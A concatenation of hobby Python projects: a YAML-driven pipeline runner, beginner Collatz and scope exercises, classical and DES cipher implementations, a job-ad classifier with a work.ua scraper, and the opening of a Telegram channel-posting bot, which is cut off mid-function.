logging.info('All Task Done')
logging.info('Output output: {}'.format(output_file))
logging.info('-' * 50)
exit(0)
if __name__ == '__main__':
main()
# start_time = '2020-03-24 20:00'
# logging.info('Start time: {}'.format(start_time))
# while True:
# if time.strftime('%Y-%m-%d %H:%M') == start_time:
# main()
# break
# time.sleep(1)
``` |
{
"source": "5x12/pipely",
"score": 2
} |
#### File: example/src/file3_shared.py
```python
class aSumPrint:
    def run(self, context):  # include context
        a_sum = context["aSum"]  # to extract from shared dictionary
        print(f'a_sum = {a_sum}')
    def __call__(self, context):
        self.run(context)  # to run the function
``` |
{
"source": "5x12/ppline",
"score": 3
} |
#### File: ppline/easy/command.py
```python
from typing import Optional
import os
from ppline.yamlread.yamlread import yamlRead
from ppline.triggerclass.triggerclass import triggerClass
class Run:
def __init__(self, config_file: Optional[str] = None,
project_dir: Optional[str] = None,
trigger_class: Optional[str] = None,
gitlab: Optional[str] = None):
self.config_file = config_file
self.project_dir = project_dir
self.trigger_class = trigger_class
self.gitlab = gitlab
if (self.config_file is None) & (self.trigger_class is None):
raise Exception(f'Nothing to do. Please specify either --config_file or --trigger_class. Use ppline --help for more info.')
if (self.config_file is not None) & (self.project_dir is None):
path = self.config_file
execute=yamlRead(dag_path=path, gitlab=self.gitlab)
execute()
if self.project_dir is not None:
path = self.project_dir+'/'+self.config_file
            if not os.path.exists(path):
raise Exception(f'Cannot find a config .yml/.yaml file at path {path}.')
execute=yamlRead(dag_path=path, gitlab=self.gitlab)
execute()
if self.trigger_class is not None:
path_to_file, class_to_trigger = self.trigger_class.split(":")
            if not os.path.exists(path_to_file):
raise Exception(f'Cannot find a .py file at path {path_to_file}.')
execute = triggerClass(path_to_file, class_to_trigger)
execute()
```
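Two hedged usage sketches for `Run`; the file paths and class name are made up:

```python
# Illustrative only -- the paths and class name below are placeholders.
from ppline.easy.command import Run

# Run a whole pipeline described by a config file inside a project directory:
Run(config_file='.ppline.yml', project_dir='.')

# Or trigger a single class from a .py file, using the "<path>:<class>" form:
Run(trigger_class='src/steps/train.py:TrainModel')
```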
#### File: validation/schemes/v1_0.py
```python
from schema import Optional, Or, Regex, Schema, Use
from ppline.utils.const import dagmap_consts
def regex_safe(text: str):
for symbol in ('.', '[', ']', '|', '^'):
text = text.replace(symbol, f'\{symbol}')
return rf'{text}'
def complete(regex):
return rf'^{regex}\Z'
exec_path_separator = regex_safe(dagmap_consts.EXEC_PATH_SEPARATOR)
STAGE_NAMING_REGEX = r'[a-zA-Z_][-\w]*'
EXEC_REGEX = rf'\S*{exec_path_separator}[a-zA-Z_]\w*'
STEP_NAME = Regex(complete(STAGE_NAMING_REGEX), error='Invalid step name.')
EXEC = Regex(complete(EXEC_REGEX), error='Exec path should be patterned as "{module_path.py}:{exec_name}".')
STATIC_DAG_SCHEMA = Schema({
dagmap_consts.STEPS_KEYNAME: {
STEP_NAME: {
dagmap_consts.EXEC_KEYNAME: EXEC,
# Optional('params'): CONTEXT_SCHEMA,
# Optional(dagmap_consts.INDEXED_INPUTS_KEYNAME): Or([OUTPUT], [INDEXED_OUTPUT], []),
# Optional(dagmap_consts.NAMED_INPUTS_KEYNAME): Or({
# dagmap_consts.ALL_INPUTS_KEYNAME: [OUTPUT]
# }, {
# OUTPUT_NAME: INDEXED_OUTPUT
# }, {})
Optional(dagmap_consts.DEPENDS_ON_KEYNAME): Or([STEP_NAME], []),
}
# },
# Optional(dagmap_consts.DEPENDS_ON_KEYNAME): Or([STEP_NAME], []),
# Optional(dagmap_consts.TAGS_KEYNAME): Or([TAG_NAME], [])
}
})
def parse_schema(dag: dict, schema: Schema) -> dict:
return schema.validate(dag)
``` |
{
"source": "5x5x5x5/Back2Basics",
"score": 4
} |
#### File: Back2Basics/python/collatz.py
```python
def collatz(number):
if number % 2 == 0:
number = number // 2
print(number)
return number
elif number == 1:
return number
else:
number = number * 3 + 1
print(number)
return number
print('Come on gimme a number!! Hurry! The milliseconds are burning!')
number = int(input())
# collatz(collatz(collatz(collatz(collatz(collatz(number))))))
print(number)
while number != 1:
number = collatz(number)
"""
if starter == 1:
print(str(starter) + ' is where we always end up')
elif starter % 2 == 0:
evenNumber = starter // 2
print(str(evenNumber))
if evenNumber == 1:
print(str(evenNumber) + ' is where we always end up')
elif evenNumber % 2 == 0:
evenNumber2 = evenNumber // 2
print(str(evenNumber2))
else:
oddNumber2 = evenNumber * 3 + 1
print(str(oddNumber2))
else:
oddNumber = starter * 3 + 1
print(str(oddNumber))
if oddNumber == 1:
print(str(oddNumber) + ' is where we always end up')
elif oddNumber % 2 == 0:
evenNumber2 = oddNumber // 2
print(str(evenNumber2))
else:
oddNumber2 = oddNumber * 3 + 1
print(str(oddNumber2))
"""
"""
def collatz(number):
if number == 1:
print(str(number) + ' is where we always end up')
return
elif number % 2 == 0:
collatz(number // 2)
else:
collatz(number * 3 + 1)
"""
"""
while number != 1:
if number % 2 == 0:
number = number // 2
print(str(number))
return finalNum
if number % 2 == 1:
number = (number *3) + 1
print(str(number))
return finalNum
if number % 2 == 0:
number = number // 2
print(str(number))
return finalNum
else:
number = (number * 3) + 1
print(str(number))
return finalNum
"""
"""
print('Go ahead and type a number already. You won\'t believe what happens next')
number = int(input())
collatz(number)
"""
"""
while True:
collatz(finalNum)
finalNum = collatz(finalNum)
if finalNum == 1:
break
"""
```
#### File: Back2Basics/python/scopePractice.py
```python
"""
# Global variables can be read from local scope.
def spam():
print(eggs)
eggs = 42
spam()
print(eggs)
"""
"""
# Local and global variables with the same name.
def spam():
eggs = 'spam local'
print(eggs) # prints 'spam local'
def bacon():
eggs = 'bacon local'
print(eggs) # prints 'bacon local'
spam()
print(eggs) # prints 'bacon local'
eggs = 'global'
bacon()
print(eggs) # prints 'global'
"""
"""
# the global statement
def spam():
global eggs
eggs = 'spam'
eggs = 'it don\'t matter'
spam()
print(eggs)
"""
"""
def spam():
global eggs
eggs = 'spam' # this is the global
def bacon():
eggs = 'bacon' # this is a local
def ham():
print(eggs) # this is the global
eggs = 42 # this is global
spam()
print(eggs)
"""
# Python will not fall back to using the global eggs variable
def spam():
eggs = 'wha??'
print(eggs) # ERROR!
eggs = 'spam local'
eggs = 'global'
spam()
# This error happens because Python sees that there is an assignment statement for eggs in the spam() function and therefore considers eggs to be local. Because print(eggs) is executed before eggs is assigned anything, the local variable eggs doesn't exist.
``` |
{
"source": "5x/cryptography-gui-app",
"score": 3
} |
#### File: cryptography-gui-app/crypt/caesar_cipher.py
```python
from crypt.alphabet import get_alphabet
from crypt.cipher_abc import CipherABC
class CaesarCipher(CipherABC):
def __init__(self, key, alphabet='EN'):
super().__init__(key)
self.symbols_collection = get_alphabet(alphabet)
@CipherABC.key.setter
def key(self, value):
self._key = int(value)
def encrypt(self, plain_text):
return self._shift_msg(self._key, plain_text)
def decrypt(self, cipher_text):
return self._shift_msg(-self._key, cipher_text)
def _shift_msg(self, key, message):
shift_map = self._shift_map(key)
shifted_msg = (shift_map.get(char, char) for char in message)
return "".join(shifted_msg)
def _shift_map(self, shift):
assoc_map = {}
for symbols in self.symbols_collection:
symbols_len = len(symbols)
if symbols_len == 0:
continue
for j in range(symbols_len):
in_char = symbols[j]
shifted = (j + shift) % symbols_len
assoc_map[in_char] = symbols[shifted]
return assoc_map
if __name__ == "__main__":
cipher = CaesarCipher("4")
crt_text = cipher.encrypt("the quick brown fox jumps over the lazy dog.")
plain_text = cipher.decrypt(crt_text)
print(crt_text)
print(plain_text)
```
#### File: cryptography-gui-app/crypt/cipher_abc.py
```python
from abc import ABCMeta, abstractmethod
class CipherABC(metaclass=ABCMeta):
def __init__(self, key, *args, **kwargs):
self.key = key
@property
def key(self):
return self._key
@key.setter
def key(self, value):
self._key = value
@abstractmethod
def encrypt(self, plain_text):
pass
@abstractmethod
def decrypt(self, cipher_text):
pass
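# --- Illustrative sketch added by the editor; not part of the original module.
# A minimal concrete subclass showing the ABC contract; the no-op cipher below
# is purely illustrative.
if __name__ == "__main__":
    class _NullCipher(CipherABC):
        def encrypt(self, plain_text):
            return plain_text
        def decrypt(self, cipher_text):
            return cipher_text
    print(_NullCipher("any-key").encrypt("hello"))  # -> hello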
```
#### File: cryptography-gui-app/crypt/des_cipher.py
```python
import hashlib
from base64 import b64encode, b64decode
from Crypto import Random
from Crypto.Cipher import DES
from crypt.cipher_abc import CipherABC
from crypt.utils.bitstr import str_to_bits, positive_align_str, bits_to_str
class DESCipher(CipherABC):
def __init__(self, key):
super().__init__(key)
@CipherABC.key.setter
def key(self, value):
string_utf = value.encode()
hash_value = hashlib.md5(string_utf)
value = hash_value.hexdigest()
value = value[:8].encode()
self._key = value
def encrypt(self, plain_text):
text = str_to_bits(plain_text)
text = positive_align_str(text, 16, "\0")
data = text.encode()
iv = Random.new().read(DES.block_size)
cipher = DES.new(self.key, DES.MODE_CFB, iv)
data = iv + cipher.encrypt(data)
cipher_text = b64encode(data).decode()
return cipher_text
def decrypt(self, cipher_text):
enc = b64decode(cipher_text.encode())
iv = enc[:DES.block_size]
cipher = DES.new(self.key, DES.MODE_CFB, iv)
enc_data = enc[DES.block_size:]
plain_bytes = cipher.decrypt(enc_data)
plain_decoded_bytes = plain_bytes.decode()
plain_text = bits_to_str(plain_decoded_bytes)
        plain_text = plain_text.rstrip("\0")  # rstrip returns a new string; assign it so the padding is actually removed
return plain_text
if __name__ == "__main__":
c = DESCipher("f1")
f = c.encrypt("""
The quick brown fox jumps over the lazy dog.
The five boxing wizards jump quickly.
В Бахчисараї фельд'єґер зумів одягнути ящірці жовтий капюшон!
Жебракують філософи при ґанку церкви в Гадячі, ще й шатро їхнє п'яне знаємо
В чащах юга жил бы цитрус? Да, но фальшивый экземпляр!
Съешь [же] ещё этих мягких французских булок да выпей чаю.
Экс-граф? Плюш изъят. Бьём чуждый цен хвощ!""")
t = c.decrypt(f)
print(f)
print(t)
```
#### File: cryptography-gui-app/crypt/gamma_cipher.py
```python
from random import Random
from crypt.trithemius_cipher import TrithemiusCipher, TrithemiusHandleABC
from crypt.cipher_abc import CipherABC
class SimplePRNG(TrithemiusHandleABC):
SHIFT_C1 = 53
def __init__(self, symbols_collection, key, *args, **kwargs):
super().__init__(*args, **kwargs)
self._symbols_len = len(symbols_collection)
self._random_inst = Random(x=key)
def __iter__(self):
while True:
rand_int = self._random_inst.randint(0, self._symbols_len)
next_val = (rand_int + SimplePRNG.SHIFT_C1) % self._symbols_len
yield next_val
def get_code(self, index):
return next(self.__iter__())
class GammaCipher(TrithemiusCipher):
def __init__(self, key, alphabet='EN'):
super().__init__(key, SimplePRNG, alphabet)
@CipherABC.key.setter
def key(self, value):
self._key = int(value)
if __name__ == "__main__":
cipher = GammaCipher("54")
crt_text = cipher.encrypt("the quick brown fox jumps over the lazy dog.")
plain_text = cipher.decrypt(crt_text)
print(crt_text)
print(plain_text)
```
#### File: crypt/utils/expr_parser.py
```python
import ast
from string import ascii_lowercase
operators = {
ast.Add: "+",
ast.Sub: "-",
ast.Mult: "*",
ast.Div: "/",
ast.Pow: "**",
ast.USub: "-", # unary -1
ast.UAdd: "+" # unary +1
}
def prepare_expression(text_expression):
parsed_expression = parse_expression(text_expression)
return eval("lambda **kwargs: " + parsed_expression)
def parse_expression(text_expression):
node = ast.parse(text_expression, mode='eval')
body = node.body
return ast_walk(body)
def ast_walk(node):
if isinstance(node, ast.Num) and isinstance(node.n, int):
return str(node.n)
elif isinstance(node, ast.BinOp):
left = ast_walk(node.left)
right = ast_walk(node.right)
op_char = operators[type(node.op)]
return "({}{}{})".format(left, op_char, right)
elif isinstance(node, ast.UnaryOp):
return operators[type(node.op)] + ast_walk(node.operand)
elif isinstance(node, ast.Name) and len(node.id) == 1 and \
node.id in ascii_lowercase:
return "kwargs['{}']".format(node.id)
else:
raise TypeError(node)
def view_evaluated_expresion(text_expression, **kwargs):
expression = prepare_expression(text_expression)
expression_value = expression(**kwargs)
parameters = ["{0}={1}".format(key, value)
for key, value in kwargs.items()]
parameters_repr = ", ".join(parameters)
echo_format = "{0}, {{{1}}} = {2}"
return echo_format.format(text_expression, parameters_repr,
expression_value)
if __name__ == "__main__":
num_of_samples = 10
for i in range(num_of_samples):
print(view_evaluated_expresion("(4*i**3)-4*(t+-9)*t", t=i, i=i * i))
```
#### File: crypt/utils/number_theory_algs.py
```python
def extended_gcd(a, b):
a, b = abs(a), abs(b)
A, B, C, D = 1, 0, 0, 1
while b != 0:
q, r = divmod(a, b)
x = A - (q * C)
y = B - (q * D)
a, b, A, C, B, D = b, r, C, x, D, y
return a, A, B
if __name__ == "__main__":
print(extended_gcd(1234, 54)) # 2, -7, 160
print(extended_gcd(654137 ** 112, 550)) # 11, -19, 78214...725
print(extended_gcd(15, 3)) # 3, 0, 1
``` |
{
"source": "5x/ds-ants-geopy-extended",
"score": 3
} |
#### File: ds-ants-geopy-extended/ants/utils.py
```python
import os
import shelve
from functools import wraps
from itertools import chain
def load_lines(file_path):
"""
Return list with loaded lines from file, separated with newline.
Leading and trailing whitespace removed from each line.
:param file_path: Absolute or relative file path.
:return: List of lines.
"""
lines = []
with open(file_path, 'r') as file:
for line in file:
lines.append(line.strip())
return lines
def __build_memoize_path(path, store_name):
if not path:
path = os.getcwd()
dir_name = '.memoize_store'
store_dir = os.path.join(path, dir_name, store_name)
if not os.path.exists(store_dir):
os.makedirs(store_dir)
return os.path.join(store_dir, store_name)
def persist_memoize(store_name, path=None):
store_path = __build_memoize_path(path, store_name)
def real_decorator(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
arguments = [str(i) for i in chain(args, kwargs.items())]
arguments = ','.join(arguments)
key = '{}:{}({})'.format(fn.__module__, fn.__name__, arguments)
with shelve.open(store_path) as store:
if key not in store:
store[key] = fn(*args, **kwargs)
store.sync()
result = store[key]
return result
return wrapper
return real_decorator
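# --- Illustrative usage sketch added by the editor; the store name and function
# below are assumptions for demonstration only. ---
if __name__ == '__main__':
    @persist_memoize('demo_store')
    def slow_square(x):
        return x * x
    print(slow_square(4))  # computed once; later calls are read back from the shelve store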
``` |
{
"source": "5x/ds-hr-helper",
"score": 3
} |
#### File: 5x/ds-hr-helper/hr_helper.py
```python
import re
from collections import Counter
from itertools import chain
from random import shuffle
from string import ascii_letters
import numpy as np
from nltk.corpus import stopwords
from nltk.stem.snowball import SnowballStemmer
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.naive_bayes import BernoulliNB
STEMMER_EN = SnowballStemmer('english')
STEMMER_RU = SnowballStemmer('russian')
STEMMER_PORTER = SnowballStemmer('porter')
PATTERN_NO_LETTERS = re.compile(r'[\W\d_]+', re.UNICODE)
CYRILLIC_BASE_SYMBOLS = 'уеъыаоэяиьюії'
JOB_ACCEPT_STR = 'Accept'
JOB_DECLINE_STR = 'Decline'
def load_file(filename, encoding='utf-8'):
with open(filename, 'r', encoding=encoding) as file:
return file.read().splitlines()
DEFAULT_STOP_WORDS = set(
stopwords.words('english') +
stopwords.words('russian') +
load_file('uk_stop_words.txt')
)
def get_most_common_values(values, n):
value_counter = Counter(values)
most_common_values = value_counter.most_common(n)
return [value for value, _ in most_common_values]
def identify_stemer(word):
for char in word:
if char in CYRILLIC_BASE_SYMBOLS:
return STEMMER_RU
elif char in ascii_letters:
return STEMMER_EN
return STEMMER_PORTER
def sanitize_word(word, stop_words, is_stem=True):
word = word.lower()
word = PATTERN_NO_LETTERS.sub('', word)
if is_stem and word not in stop_words:
stemmer = identify_stemer(word)
word = stemmer.stem(word)
return word
def get_sentence_sanitized_words(text, stop_words, is_stem=True):
clean_words = []
terms = text.split()
for term in terms:
word = sanitize_word(term, stop_words, is_stem)
if word and word not in stop_words:
clean_words.append(word)
return clean_words
def get_all_words(values, stop_words, is_stem=True):
words_generator = (get_sentence_sanitized_words(value, stop_words, is_stem)
for value in values)
return list(chain.from_iterable(words_generator))
def normalize_weights(weights):
min_value = min(weights)
max_value = max(weights) - min_value
if max_value == 0:
max_value = 1
return [(w - min_value) / max_value for w in weights]
def calculate_min_accept_weight(weights, percent_of_accept):
num_of_variants = len(weights)
max_accept_index = (1 - percent_of_accept / 100) * num_of_variants
max_accept_index = round(max_accept_index)
sorted_weights = sorted(weights)
possible_weights = sorted_weights[max_accept_index:]
return next((weight for weight in possible_weights if weight > 0), 1)
def decisions_job_offers(weights, percent_of_accept):
yes_str, no_str = JOB_ACCEPT_STR, JOB_DECLINE_STR
accept_limit = calculate_min_accept_weight(weights, percent_of_accept)
return [yes_str if weight >= accept_limit else no_str
for weight in weights]
def calculate_simple_weight(words, word, word_weight, _):
return words.count(word) / word_weight
def calculate_common_weight(words, word, word_weight, _):
return words.count(word) ** (1 / word_weight)
def calculate_common_extended_weight(words, word, word_weight, common_words):
return words.count(word) ** (1 - word_weight / len(common_words))
def build_weights(data, common_words, stop_words, is_stem=True):
weights = []
for text in data:
words = get_sentence_sanitized_words(text, stop_words, is_stem)
entry_weight = 0
for word_weight, word in enumerate(common_words, 1):
entry_weight += calculate_common_weight(words, word, word_weight,
common_words)
weights.append(entry_weight)
return normalize_weights(weights)
def classification(classificator, vectorizer, x_train, y_train, x_test):
x_train = vectorizer.fit_transform(x_train)
    y_train = np.array(y_train, dtype=str)  # np.str was removed in newer NumPy; the builtin str is equivalent here
x_test = vectorizer.transform(x_test)
classificator.fit(x_train, y_train)
return classificator.predict(x_test)
def build_tokenizer(stop_words, is_stem):
def tokenizer(text):
return get_sentence_sanitized_words(text, stop_words, is_stem)
return tokenizer
def build_training_data(data, num_of_common_words, percent_of_accept,
stop_words, is_stem=False):
words = get_all_words(data, stop_words, is_stem)
common_words = get_most_common_values(words, num_of_common_words)
weights = build_weights(data, common_words, stop_words, is_stem)
return decisions_job_offers(weights, percent_of_accept)
def show_head_entries(x_test, y_test, n, show_declined=False):
needed_status = JOB_DECLINE_STR if show_declined else JOB_ACCEPT_STR
for index, status in enumerate(y_test):
if status == needed_status:
value = x_test[index]
template = '[{}] #{:04}: {}...'
print(template.format(status, index, value[:60]))
n -= 1
if n <= 0:
break
def classificate_jobs(data, exclude_words, num_of_train_rows,
num_of_common_words, percent_of_accept, is_stem):
stop_words = set(exclude_words)
stop_words.update(DEFAULT_STOP_WORDS)
tokenizer = build_tokenizer(stop_words, is_stem)
vectorizer = TfidfVectorizer(tokenizer=tokenizer, lowercase=False,
stop_words=None, dtype=np.float64)
x_train = data[:num_of_train_rows]
x_test = data[num_of_train_rows:]
y_train = build_training_data(x_train, num_of_common_words,
percent_of_accept, stop_words, is_stem)
clf = BernoulliNB(alpha=1)
y_test = classification(clf, vectorizer, x_train, y_train, x_test)
    print('Word SnowballStemmer enabled: {}.'.format(is_stem))
common_words_template = 'Number of common words used for training: {}.'
print(common_words_template.format(num_of_common_words))
print('Loaded data size: {}.'.format(len(data)))
print('Training data size: {}.'.format(len(x_train)))
print('Test data size: {}.'.format(len(x_test)))
train_counter = Counter(y_train)
train_accepted = train_counter.get(JOB_ACCEPT_STR, 0)
train_declined = train_counter.get(JOB_DECLINE_STR, 0)
train_data_percent_of_accept = train_accepted / (len(x_train) / 100)
percent_of_accept_template = 'Defined training percent of accept: {:.2f}%.'
print(percent_of_accept_template.format(percent_of_accept))
train_data_template = 'Real training percent of accept: {:.2f}%.'
print(train_data_template.format(train_data_percent_of_accept))
accepted_template = 'Training data distribution(Accept/Decline): {}/{}.'
print(accepted_template.format(train_accepted, train_declined))
y_test_counter = Counter(y_test)
test_accept = y_test_counter.get(JOB_ACCEPT_STR, 0)
test_decline = y_test_counter.get(JOB_DECLINE_STR, 0)
test_data_percent_of_accept = test_accept / (len(x_test) / 100)
percent_of_accept_template = 'Test data percent of accept: {:.2f}%.'
print(percent_of_accept_template.format(test_data_percent_of_accept))
test_accept_template = 'Test data distribution(Accept/Decline): {}/{}.'
print(test_accept_template.format(test_accept, test_decline))
num_of_previews = 10
print('\nFirst Accepted in training data:')
show_head_entries(x_train, y_train, num_of_previews)
print('\nFirst Declined in training data:')
show_head_entries(x_train, y_train, num_of_previews, show_declined=True)
print('\nFirst Accepted in test data:')
show_head_entries(x_test, y_test, num_of_previews)
print('\nFirst Declined in test data:')
show_head_entries(x_test, y_test, num_of_previews, show_declined=True)
if __name__ == '__main__':
    print('Info: \'Stemmer\' is a slow operation, so this will take some time.')
print('Wait few seconds...\n\n')
data_filename = 'it_jobs.txt'
data_lines = load_file(data_filename)
shuffle(data_lines)
classificate_jobs(
data_lines,
exclude_words=[],
num_of_train_rows=300,
num_of_common_words=500,
percent_of_accept=15,
is_stem=True
)
```
#### File: ds-hr-helper/webscraper/helpers.py
```python
from .logger import logger
def url_filter(url, state, pattern):
if not pattern.match(url):
raise ValueError
def get_node_flat_string(tag, separator=' '):
content = tag.get_text(separator=separator)
content_parts = content.split()
return separator.join(content_parts)
def append_to_file(filename, content, new_line=True):
with open(filename, 'a', encoding='utf-8') as file:
file.write(content)
logger.info('Write line to file(%s).', filename)
if new_line:
file.write('\n')
```
#### File: ds-hr-helper/webscraper/link_spider.py
```python
from urllib.parse import urljoin, urldefrag, urlparse
from bs4 import BeautifulSoup
async def link_spider(url, state, scraper, host=None):
html_content = state[url]
soup = BeautifulSoup(html_content, 'lxml')
links = soup.find_all('a', href=True)
urls = []
for page_link in links:
href = page_link.get('href').strip()
href = urljoin(url, href)
href = urldefrag(href)[0]
if host is None or urlparse(href).hostname == host:
urls.append(href)
scraper.fetch_urls(urls)
```
#### File: ds-hr-helper/webscraper/webscraper.py
```python
import asyncio
from inspect import isawaitable
import aiohttp
from .logger import logger
EVENT_WORKER_START = 'worker_start'
EVENT_WORKER_END = 'worker_end'
EVENT_BEFORE_REQUEST = 'before_request'
EVENT_AFTER_REQUEST = 'after_request'
class ScraperDataState(object):
def __init__(self):
self.data = {}
self.fetched_urls = {}
def __getitem__(self, key):
if key in self.data:
return self.data[key]
return None
def __iter__(self):
return self.data.__iter__()
def prepare(self, url):
self.fetched_urls[url] = None
def save(self, url, data):
self.data[url] = data
class WebScraper(object):
MAX_ATTEMPTS_TO_RETRY_LOOP = 5
DEFAULT_CONCURRENCY_LIMIT = 8
TIMEOUT_LIMIT = 120
DEFAULT_REQUEST_PER_MINUTE = 10000
def __init__(self, urls, dispatcher=None, rpm=None, timeout=None):
self.__urls = urls[:]
self.__dispatcher = dispatcher if dispatcher else HandlerDispatcher()
self.__rpm = rpm if rpm else self.DEFAULT_REQUEST_PER_MINUTE
self.__retry_timeout = timeout if timeout else self.TIMEOUT_LIMIT
self.__remaining_num_of_attempts = self.MAX_ATTEMPTS_TO_RETRY_LOOP
self.__concurrency_limit = self.DEFAULT_CONCURRENCY_LIMIT
self.__state = ScraperDataState()
self.__delay_buffer_size = 0
self.__is_forced_stop = False
def fetch_urls(self, urls):
self.__urls.extend(urls)
async def travel(self):
await self.__dispatcher.dispatch(EVENT_WORKER_START,
state=self.__state)
while not self.__is_forced_stop:
urls = self.__get_url_batch()
await asyncio.gather(*[self.__fetch(url) for url in urls],
return_exceptions=False)
await self.__check_timeout_limit()
await self.__dispatcher.dispatch(EVENT_WORKER_END, state=self.__state)
async def __fetch(self, url, **kwargs):
self.__state.prepare(url)
try:
await self.__dispatcher.dispatch(EVENT_BEFORE_REQUEST,
state=self.__state, url=url)
except ValueError:
return
await self.__delay()
try:
async with aiohttp.ClientSession() as session:
async with session.get(url, **kwargs) as response:
response_text = await response.text()
self.__state.save(url, response_text)
await self.__dispatcher.dispatch(EVENT_AFTER_REQUEST,
state=self.__state,
url=url)
except (aiohttp.client_exceptions.InvalidURL, ValueError):
return
async def __delay(self, min_delay=10):
rps = 60 / self.__rpm
self.__delay_buffer_size += rps
if self.__delay_buffer_size >= min_delay:
sleep_time, rest_delay = divmod(self.__delay_buffer_size, 1)
self.__delay_buffer_size = rest_delay
logger.info('Delay %s seconds for RPM limiting.', sleep_time)
await asyncio.sleep(sleep_time)
async def __check_timeout_limit(self):
if self.__urls:
self.__remaining_num_of_attempts = self.MAX_ATTEMPTS_TO_RETRY_LOOP
else:
self.__remaining_num_of_attempts -= 1
if self.__remaining_num_of_attempts <= 0:
self.__is_forced_stop = True
return
timeout_msg_template = 'Waiting for new urls, timeout %s seconds.'
logger.info(timeout_msg_template, self.__retry_timeout)
await asyncio.sleep(self.__retry_timeout)
def __get_url_batch(self):
urls_batch = set()
while self.__urls and len(urls_batch) < self.__concurrency_limit:
url = self.__urls.pop()
if url not in self.__state.fetched_urls and url not in urls_batch:
urls_batch.add(url)
return urls_batch
class HandlerDispatcher(object):
def __init__(self):
self.__handlers = {}
async def dispatch(self, channel, *args, return_exceptions=True, **kwargs):
if channel not in self.__handlers:
return
for handler, bound_kwargs in self.__handlers[channel]:
try:
result = handler(*args, **kwargs, **bound_kwargs)
if isawaitable(result):
await result
except Exception as e:
if return_exceptions:
raise e
def register(self, handler, *channels, **kwargs):
if not hasattr(handler, '__call__'):
raise TypeError("Handler not callable.")
for channel in channels:
if channel not in self.__handlers:
self.__handlers[channel] = []
self.__handlers[channel].append((handler, kwargs))
```
#### File: 5x/ds-hr-helper/work_ua_scraper.py
```python
import asyncio
import re
import sys
from bs4 import BeautifulSoup
from webscraper.webscraper import HandlerDispatcher, WebScraper, \
EVENT_BEFORE_REQUEST, EVENT_AFTER_REQUEST
from webscraper.link_spider import link_spider
from webscraper.helpers import get_node_flat_string, append_to_file, \
url_filter
from webscraper.logger import logger, http_logger
if sys.platform not in ('win32', 'cygwin', 'cli'):
import uvloop
policy = uvloop.EventLoopPolicy()
asyncio.set_event_loop_policy(policy)
def data_work_ua_jobs_extractor(url, state, filename):
html_content = state[url]
soup = BeautifulSoup(html_content, 'lxml')
card = soup.find('div', {'class': 'card wordwrap'})
if not card:
return
it_job_node = soup.find(it_job_node_filter)
if not it_job_node:
return
content = get_node_flat_string(card)
job_description = get_job_description(content)
if job_description:
append_to_file(filename, job_description)
def it_job_node_filter(tag):
try:
category_link = tag.name == 'a' and 'IT' in tag.get_text()
wrapper_node = tag.parent.parent.parent.find('h5')
category_header = 'Вакансии в категор' in wrapper_node.get_text()
return category_link and category_header
except AttributeError:
return False
def get_job_description(content):
start_separator = 'Описание вакансии '
end_separator = ' Отправить резюме'
start_index = content.find(start_separator) + len(start_separator)
end_index = content.find(end_separator)
if start_index < 0 or end_index < 0:
return None
return content[start_index:end_index]
def scrap():
urls = ['https://www.work.ua/jobs-it/?category=1']
dispatcher = HandlerDispatcher()
scraper = WebScraper(urls, dispatcher)
filter_pattern = re.compile(
'^https:\/\/www.work.ua\/(jobs-it\/|jobs\/\d+\/$)')
dispatcher.register(url_filter, EVENT_BEFORE_REQUEST,
pattern=filter_pattern)
dispatcher.register(http_logger, EVENT_AFTER_REQUEST)
dispatcher.register(link_spider, EVENT_AFTER_REQUEST,
scraper=scraper)
dispatcher.register(data_work_ua_jobs_extractor, EVENT_AFTER_REQUEST,
filename='it_jobs.txt')
logger.info('Start scrapping....')
loop = asyncio.get_event_loop()
loop.run_until_complete(scraper.travel())
loop.close()
logger.info('Completed.')
if __name__ == '__main__':
scrap()
``` |
{
"source": "5xJIN/DailyAlgorithm",
"score": 3
} |
#### File: DailyAlgorithm/LeetCode/1. Two Sum.py
```python
"""1. Two Sum.py
# Runtime : 32 ms
# Memory : 14.6 MB
"""
from typing import List
class Solution:
def twoSum(self, nums: List[int], target: int) -> List[int]:
resultDict = dict()
for i in range(len(nums)):
if nums[i] in resultDict:
return [resultDict[nums[i]], i]
resultDict[target - nums[i]] = i
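# --- Illustrative usage sketch added by the editor; not part of the original solution.
if __name__ == "__main__":
    print(Solution().twoSum([2, 7, 11, 15], 9))  # -> [0, 1]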
```
#### File: DailyAlgorithm/LeetCode/9. Palindrome Number.py
```python
class Solution:
def isPalindrome(self, x: int) -> bool:
maxSize = pow(2, 31)
if 0 < x < maxSize - 1:
origin = x
revert = 0
while (origin > 0):
revert = revert * 10
remainder = origin % 10
origin = origin // 10
revert += remainder
return x == revert
else:
if x == 0:
return True
else:
return False
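# --- Illustrative usage sketch added by the editor; not part of the original solution.
if __name__ == "__main__":
    print(Solution().isPalindrome(121))   # -> True
    print(Solution().isPalindrome(-121))  # -> False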
``` |
{
"source": "5x/tg_schedule_woodpecker",
"score": 3
} |
#### File: 5x/tg_schedule_woodpecker/main.py
```python
import html
import json
import logging
import traceback
from pathlib import Path
from telegram import Update, ParseMode
from telegram.ext import Updater, CommandHandler
# The token you got from @botfather when you created the bot
API_TOKEN = '{{YOU_API_TOKEN}}'
# This can be your own ID, or one for a developer group/channel.
# You can use the /uinfo command of this bot to see your chat id.
DEVELOPER_CHAT_ID = 12345678
# Users who can execute commands with elevated rights.
PRIVILEGED_USERS = (DEVELOPER_CHAT_ID,)
# The channel to which the bot will publish content.
# Bot must be an administrator of channel & have permission to post.
CHANNEL = '@you_channel_to_post'
# The destination path for the source media to be published.
RESOURCE_PATH = Path('./data')
# The destination path for media already published.
PUBLISHED_ARCHIVE = Path('./data/published_archive')
# Enable logging
logging.basicConfig(
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
level=logging.INFO
)
logger = logging.getLogger(__name__)
def start_handler(update: Update, _):
"""Initial user communication dialog."""
info_text = '*tg_schedule_woodpecker* _v1.0.1_\n' \
'Hello! I am sending media files to Telegram channel ' \
'according to selected interval schedule.\n\n' \
'You can control me by sending these commands:\n\n' \
'*Commands*\n' \
'/start - Initial point (now you here)\n' \
'/help - List of available commands (same as /start)\n' \
'/send - Post next media to channel now\n' \
'/set [[interval]] - Create schedule job for publishing a ' \
'limited set of media\n' \
'/clear - Clear the current job queue\n' \
'/uinfo - You personal Telegram account information'
update.message.reply_text(info_text, parse_mode=ParseMode.MARKDOWN)
def error_handler(update, context):
"""Log the error and send a telegram message to notify the developer."""
error = context.error
tb_list = traceback.format_exception(None, error, error.__traceback__)
tb_string = ''.join(tb_list)
